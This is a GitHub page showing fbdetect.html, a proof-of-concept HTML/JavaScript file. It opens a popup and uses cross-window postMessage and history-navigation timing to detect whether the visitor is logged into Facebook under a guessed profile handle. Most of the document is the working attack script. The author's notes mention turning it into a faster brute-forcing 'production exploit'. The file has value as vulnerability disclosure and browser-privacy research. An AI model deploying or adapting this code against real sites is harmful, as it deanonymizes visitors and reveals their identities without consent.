forked from FladeX/homakov.github.com
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathfbdetect.html
61 lines (50 loc) · 1.71 KB
/
fbdetect.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
<html><body>
This is only PoC. Type smth like oijfowijefohwqe and your real handle on Facebook e.g. http://facebook.com/<b>egor.homakov</b> and see how detector works. It's pretty slow (<b>6 seconds</b> to be sure) history object is changed as soon as full page has been loaded. <br>
<br>
In production exploit I could invent something for fast brute and history.forward(), but PoC is interesting on itself. And, yeah, you don't need to allow Popups in Chrome - because Popup in Chrome get opened in fact and nicely work in background. <b>Just wait...</b>
<br>
<script>
window.onmessage=function(e){
if(await){
clearTimeout(exact);
alert("No, you're not "+handle);
x.history.go(1);
setTimeout(try_next,timeout)
}else{
await = true;
}
}
https = confirm('Do you have "https" in your profile URL? Cancel = NO, OK = YES')
timeout = 9000// parseInt(prompt('Timeout for your network? Recommended 9000 - 9 seconds'));
if(https){
base='https://www.facebook.com'
}else{
base='http://www.facebook.com'
}
await = false;
exact = false;
handles = prompt('Your handle: (e.g. egor.homakov )').split(' ')
get_handle = function(){
return handles.shift()
}
try_next = function(){
// here we can just brute force ..
if(handles.length==0) return false
handle = get_handle()
next=base+'/'+handle+'#'
console.log('Navigate to ',next)
x.location=next;
setTimeout(function(){
x.history.back()
exact = setTimeout(function(){
alert('Yes you are '+handle)
}, 300);
},10)
}
x=window.open('data:text/html,<script>opener.postMessage("","*")<'+'/script>');
from_scratch=function(){
x.location=(base+'/profile.php')
setTimeout(try_next, timeout)
}
setTimeout(from_scratch,1000)
</script></body></html>